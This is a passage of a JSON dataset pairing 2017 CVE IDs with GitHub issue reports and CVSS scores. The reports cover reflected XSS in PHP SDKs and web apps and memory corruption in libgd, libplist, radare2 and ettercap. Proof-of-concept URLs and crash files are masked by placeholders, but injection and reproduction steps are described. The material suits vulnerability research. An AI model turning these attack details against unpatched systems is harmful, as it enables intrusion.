  12770. "Issue_Url_old": "https://github.com/paypal/permissions-sdk-php/issues/19",
  12771. "Issue_Url_new": "https://github.com/paypal/permissions-sdk-php/issues/19",
  12772. "Repo_new": "paypal/permissions-sdk-php",
  12773. "Issue_Created_At": "2017-02-21T10:28:14Z",
  12774. "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on$_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12775. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12776. "severity": "MEDIUM",
  12777. "baseScore": 5.4,
  12778. "impactScore": 2.7,
  12779. "exploitabilityScore": 2.3
  12780. },
  12781. {
  12782. "CVE_ID": "CVE-2017-6216",
  12783. "Issue_Url_old": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
  12784. "Issue_Url_new": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
  12785. "Repo_new": "novaksolutions/infusionsoft-php-sdk",
  12786. "Issue_Created_At": "2017-02-23T03:41:11Z",
  12787. "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP _REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12788. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12789. "severity": "MEDIUM",
  12790. "baseScore": 6.1,
  12791. "impactScore": 2.7,
  12792. "exploitabilityScore": 2.8
  12793. },
  12794. {
  12795. "CVE_ID": "CVE-2017-6217",
  12796. "Issue_Url_old": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
  12797. "Issue_Url_new": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
  12798. "Repo_new": "paypal/adaptivepayments-sdk-php",
  12799. "Issue_Created_At": "2017-02-21T10:03:58Z",
  12800. "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12801. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12802. "severity": "MEDIUM",
  12803. "baseScore": 6.1,
  12804. "impactScore": 2.7,
  12805. "exploitabilityScore": 2.8
  12806. },
  12807. {
  12808. "CVE_ID": "CVE-2017-6319",
  12809. "Issue_Url_old": "https://github.com/radare/radare2/issues/6836",
  12810. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6836",
  12811. "Repo_new": "radareorg/radare2",
  12812. "Issue_Created_At": "2017-02-23T18:09:20Z",
  12813. "description": "SIGSEGV in APITAG SIGSEGV in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12814. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12815. "severity": "HIGH",
  12816. "baseScore": 7.8,
  12817. "impactScore": 5.9,
  12818. "exploitabilityScore": 1.8
  12819. },
  12820. {
  12821. "CVE_ID": "CVE-2017-6362",
  12822. "Issue_Url_old": "https://github.com/libgd/libgd/issues/381",
  12823. "Issue_Url_new": "https://github.com/libgd/libgd/issues/381",
  12824. "Repo_new": "libgd/libgd",
  12825. "Issue_Created_At": "2017-02-14T09:42:07Z",
  12826. "description": "libgd double free vulnerability. Description I find the libgd double free vulnerability when call APITAG function. Environment Ubuntu NUMBERTAG libgd NUMBERTAG APITAG commit APITAG Detail ERRORTAG the c code CODETAG",
  12827. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12828. "severity": "HIGH",
  12829. "baseScore": 7.5,
  12830. "impactScore": 3.6,
  12831. "exploitabilityScore": 3.9
  12832. },
  12833. {
  12834. "CVE_ID": "CVE-2017-6363",
  12835. "Issue_Url_old": "https://github.com/libgd/libgd/issues/383",
  12836. "Issue_Url_new": "https://github.com/libgd/libgd/issues/383",
  12837. "Repo_new": "libgd/libgd",
  12838. "Issue_Created_At": "2017-02-17T16:51:11Z",
  12839. "description": "Invalid read when call APITAG Description ======== Hi, when I fuzz the libgd, a invalid read occurs within the function APITAG of gd_tiff.c, it can be triggered by the FILETAG Valgrind tracker ======== ERRORTAG",
  12840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  12841. "severity": "HIGH",
  12842. "baseScore": 8.1,
  12843. "impactScore": 5.2,
  12844. "exploitabilityScore": 2.8
  12845. },
  12846. {
  12847. "CVE_ID": "CVE-2017-6387",
  12848. "Issue_Url_old": "https://github.com/radare/radare2/issues/6857",
  12849. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6857",
  12850. "Repo_new": "radareorg/radare2",
  12851. "Issue_Created_At": "2017-02-27T13:23:17Z",
  12852. "description": "Out of bounds read in APITAG Out of bounds read in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: r2 A r2_hoobr_dex_loadcode ASAN: ERRORTAG",
  12853. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12854. "severity": "MEDIUM",
  12855. "baseScore": 5.5,
  12856. "impactScore": 3.6,
  12857. "exploitabilityScore": 1.8
  12858. },
  12859. {
  12860. "CVE_ID": "CVE-2017-6390",
  12861. "Issue_Url_old": "https://github.com/soruly/whatanime.ga/issues/8",
  12862. "Issue_Url_new": "https://github.com/soruly/trace.moe/issues/8",
  12863. "Repo_new": "soruly/trace.moe",
  12864. "Issue_Created_At": "2017-02-27T18:14:23Z",
  12865. "description": "whatanime.ga (lastest version) Cross Site Scripting (XSS). Product\uff1awhatanime.ga Download: FILETAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201curl\u201d HTTP GET parameter passed to \u201cwhatanime.ga APITAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12866. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12867. "severity": "MEDIUM",
  12868. "baseScore": 6.1,
  12869. "impactScore": 2.7,
  12870. "exploitabilityScore": 2.8
  12871. },
  12872. {
  12873. "CVE_ID": "CVE-2017-6391",
  12874. "Issue_Url_old": "https://github.com/kaltura/server/issues/5300",
  12875. "Issue_Url_new": "https://github.com/kaltura/server/issues/5300",
  12876. "Repo_new": "kaltura/server",
  12877. "Issue_Created_At": "2017-02-27T14:43:53Z",
  12878. "description": "Kaltura/server (lastest version) Cross Site Scripting (XSS). Produce\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12879. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12880. "severity": "MEDIUM",
  12881. "baseScore": 6.1,
  12882. "impactScore": 2.7,
  12883. "exploitabilityScore": 2.8
  12884. },
  12885. {
  12886. "CVE_ID": "CVE-2017-6392",
  12887. "Issue_Url_old": "https://github.com/kaltura/server/issues/5303",
  12888. "Issue_Url_new": "https://github.com/kaltura/server/issues/5303",
  12889. "Repo_new": "kaltura/server",
  12890. "Issue_Created_At": "2017-02-27T16:06:15Z",
  12891. "description": "kaltura/server (lastest version) Cross Site Scripting (XSS) in APITAG Product\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12892. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12893. "severity": "MEDIUM",
  12894. "baseScore": 6.1,
  12895. "impactScore": 2.7,
  12896. "exploitabilityScore": 2.8
  12897. },
  12898. {
  12899. "CVE_ID": "CVE-2017-6393",
  12900. "Issue_Url_old": "https://github.com/NagVis/nagvis/issues/91",
  12901. "Issue_Url_new": "https://github.com/nagvis/nagvis/issues/91",
  12902. "Repo_new": "nagvis/nagvis",
  12903. "Issue_Created_At": "2017-02-27T17:17:01Z",
  12904. "description": "APITAG (lastest version) Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cobject_id\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12905. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12906. "severity": "MEDIUM",
  12907. "baseScore": 6.1,
  12908. "impactScore": 2.7,
  12909. "exploitabilityScore": 2.8
  12910. },
  12911. {
  12912. "CVE_ID": "CVE-2017-6394",
  12913. "Issue_Url_old": "https://github.com/openemr/openemr/issues/498",
  12914. "Issue_Url_new": "https://github.com/openemr/openemr/issues/498",
  12915. "Repo_new": "openemr/openemr",
  12916. "Issue_Created_At": "2017-02-27T17:30:54Z",
  12917. "description": "APITAG (lastest version) Multiple Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  12918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12919. "severity": "MEDIUM",
  12920. "baseScore": 6.1,
  12921. "impactScore": 2.7,
  12922. "exploitabilityScore": 2.8
  12923. },
  12924. {
  12925. "CVE_ID": "CVE-2017-6395",
  12926. "Issue_Url_old": "https://github.com/jacobwb/hashover-next/issues/152",
  12927. "Issue_Url_new": "https://github.com/jacobwb/hashover-next/issues/152",
  12928. "Repo_new": "jacobwb/hashover-next",
  12929. "Issue_Created_At": "2017-02-27T15:41:28Z",
  12930. "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201chashover script\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
  12931. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12932. "severity": "MEDIUM",
  12933. "baseScore": 6.1,
  12934. "impactScore": 2.7,
  12935. "exploitabilityScore": 2.8
  12936. },
  12937. {
  12938. "CVE_ID": "CVE-2017-6396",
  12939. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/820",
  12940. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/820",
  12941. "Repo_new": "wpo-foundation/webpagetest",
  12942. "Issue_Created_At": "2017-02-27T14:46:24Z",
  12943. "description": "WPO Foundation/webpagetest (lastest version) Cross Site Scripting (XSS). Product\uff1aWPO Foundation/webpagetest Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpssid\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12944. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12945. "severity": "MEDIUM",
  12946. "baseScore": 6.1,
  12947. "impactScore": 2.7,
  12948. "exploitabilityScore": 2.8
  12949. },
  12950. {
  12951. "CVE_ID": "CVE-2017-6415",
  12952. "Issue_Url_old": "https://github.com/radare/radare2/issues/6872",
  12953. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6872",
  12954. "Repo_new": "radareorg/radare2",
  12955. "Issue_Created_At": "2017-03-01T09:49:29Z",
  12956. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
  12957. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12958. "severity": "MEDIUM",
  12959. "baseScore": 5.5,
  12960. "impactScore": 3.6,
  12961. "exploitabilityScore": 1.8
  12962. },
  12963. {
  12964. "CVE_ID": "CVE-2017-6429",
  12965. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/278",
  12966. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/278",
  12967. "Repo_new": "appneta/tcpreplay",
  12968. "Issue_Created_At": "2017-02-08T16:16:29Z",
  12969. "description": "tcpcapinfo buffer overflow vulnerablily. From Aromal Raj via APITAG Hi, This mail is to report a Buffer Overflow Vulnerability which i found in 'tcpcapinfo' utility which comes with latest Tcpreplay NUMBERTAG ersion. This happens when tcpcapinfo process a specially crafted pcap file. APITAG to reproduce: raras APITAG tcpcapinfo APITAG \u200b Expected Output: Invalid file should not be parsed. Actual Output: Buffer Overflow APITAG following files attached: APITAG Which is the crafted pcap file gdb.log GDB output valgrind.log Valgrind output Can \u200bthis have a patch upstream? Thanks & Regards, Aromal Raj",
  12970. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12971. "severity": "HIGH",
  12972. "baseScore": 7.8,
  12973. "impactScore": 5.9,
  12974. "exploitabilityScore": 1.8
  12975. },
  12976. {
  12977. "CVE_ID": "CVE-2017-6430",
  12978. "Issue_Url_old": "https://github.com/Ettercap/ettercap/issues/782",
  12979. "Issue_Url_new": "https://github.com/ettercap/ettercap/issues/782",
  12980. "Repo_new": "ettercap/ettercap",
  12981. "Issue_Created_At": "2017-02-07T19:26:29Z",
  12982. "description": "Etterfilter: Invalid read on crafted file APITAG Fault).. Etterfilter results in an invalid read of NUMBERTAG bytes when parsing a crafted file. As seen in valgrind output the issue occurs in the compile_tree function of the ef_compiler.c source file. Steps to reproduce (run on current master ettercap branch): raras APITAG etterfilter crashfile Expected output (possibly): File should not be parsed and error message should be printed stating invalid file. Actual output: Segmentation Fault POC crash file is also attached: FILETAG Valgrind output is as follows: APITAG valgrind etterfilter PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: etterfilter PATHTAG NUMBERTAG etterfilter NUMBERTAG copyright NUMBERTAG Ettercap Development Team NUMBERTAG protocol tables loaded: DECODED DATA udp tcp esp gre icmp ip NUMBERTAG ip arp wifi fddi tr eth NUMBERTAG constants loaded: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file PATHTAG done. BUG at PATHTAG tree_root == NULL NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7B9: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG bc NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2CC NUMBERTAG calloc (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG A2: globals_alloc (in PATHTAG NUMBERTAG by NUMBERTAG AF: main (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault Thanks, Raj",
  12983. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12984. "severity": "MEDIUM",
  12985. "baseScore": 5.5,
  12986. "impactScore": 3.6,
  12987. "exploitabilityScore": 1.8
  12988. },
  12989. {
  12990. "CVE_ID": "CVE-2017-6435",
  12991. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/93",
  12992. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/93",
  12993. "Repo_new": "libimobiledevice/libplist",
  12994. "Issue_Created_At": "2017-02-07T06:56:22Z",
  12995. "description": "memory corruption bug. Hi, I found a memory corruption bug. the stack trace is as shown below NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fff NUMBERTAG bytes APITAG NUMBERTAG ERROR: APITAG memcpy param overlap: memory ranges FILETAG",
  12996. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  12997. "severity": "MEDIUM",
  12998. "baseScore": 5.0,
  12999. "impactScore": 3.6,
  13000. "exploitabilityScore": 1.3
  13001. },
  13002. {
  13003. "CVE_ID": "CVE-2017-6436",
  13004. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/94",
  13005. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/94",
  13006. "Repo_new": "libimobiledevice/libplist",
  13007. "Issue_Created_At": "2017-02-08T03:48:41Z",
  13008. "description": "Memory allocation error. ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG ec4b2 ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG ed ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG b7c in parse_string_node PATHTAG NUMBERTAG b7c in parse_bin_node PATHTAG NUMBERTAG b7c in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG ) poc: FILETAG",
  13009. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13010. "severity": "MEDIUM",
  13011. "baseScore": 5.0,
  13012. "impactScore": 3.6,
  13013. "exploitabilityScore": 1.3
  13014. },
  13015. {
  13016. "CVE_ID": "CVE-2017-6437",
  13017. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/100",
  13018. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/100",
  13019. "Repo_new": "libimobiledevice/libplist",
  13020. "Issue_Created_At": "2017-02-24T08:36:42Z",
  13021. "description": "heap buffer overflow in base NUMBERTAG encode NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG bf NUMBERTAG fda8 sp NUMBERTAG bf NUMBERTAG fd9c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG d in base NUMBERTAG encode PATHTAG NUMBERTAG in node_to_xml PATHTAG NUMBERTAG f in plist_to_xml PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  13022. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13023. "severity": "MEDIUM",
  13024. "baseScore": 5.0,
  13025. "impactScore": 3.6,
  13026. "exploitabilityScore": 1.3
  13027. },
  13028. {
  13029. "CVE_ID": "CVE-2017-6438",
  13030. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/98",
  13031. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/98",
  13032. "Repo_new": "libimobiledevice/libplist",
  13033. "Issue_Created_At": "2017-02-24T08:24:43Z",
  13034. "description": "heap buffer overflow in parse_unicode_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG bp NUMBERTAG bf8e7e NUMBERTAG sp NUMBERTAG bf8e7e6c WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG in parse_unicode_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  13035. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  13036. "severity": "HIGH",
  13037. "baseScore": 7.3,
  13038. "impactScore": 5.9,
  13039. "exploitabilityScore": 1.3
  13040. },
  13041. {
  13042. "CVE_ID": "CVE-2017-6439",
  13043. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/95",
  13044. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/95",
  13045. "Repo_new": "libimobiledevice/libplist",
  13046. "Issue_Created_At": "2017-02-08T05:08:19Z",
  13047. "description": "heap buffer overflow in parse_string_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG e at pc NUMBERTAG b bp NUMBERTAG bfabe NUMBERTAG sp NUMBERTAG bfabdffc WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG e thread T NUMBERTAG a in parse_string_node PATHTAG NUMBERTAG a in parse_bin_node PATHTAG NUMBERTAG a in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f9ba NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG e is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  13048. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13049. "severity": "MEDIUM",
  13050. "baseScore": 5.0,
  13051. "impactScore": 3.6,
  13052. "exploitabilityScore": 1.3
  13053. },
  13054. {
  13055. "CVE_ID": "CVE-2017-6440",
  13056. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/99",
  13057. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/99",
  13058. "Repo_new": "libimobiledevice/libplist",
  13059. "Issue_Created_At": "2017-02-24T08:32:19Z",
  13060. "description": "Memory allocation error NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eff NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG Process memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5e NUMBERTAG b5f NUMBERTAG b5f8a NUMBERTAG b5f9b NUMBERTAG b5f9b NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fbb NUMBERTAG PATHTAG NUMBERTAG b5fbb NUMBERTAG b5fbc NUMBERTAG PATHTAG NUMBERTAG b5fbc NUMBERTAG b5fbd NUMBERTAG PATHTAG NUMBERTAG b5fbd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b 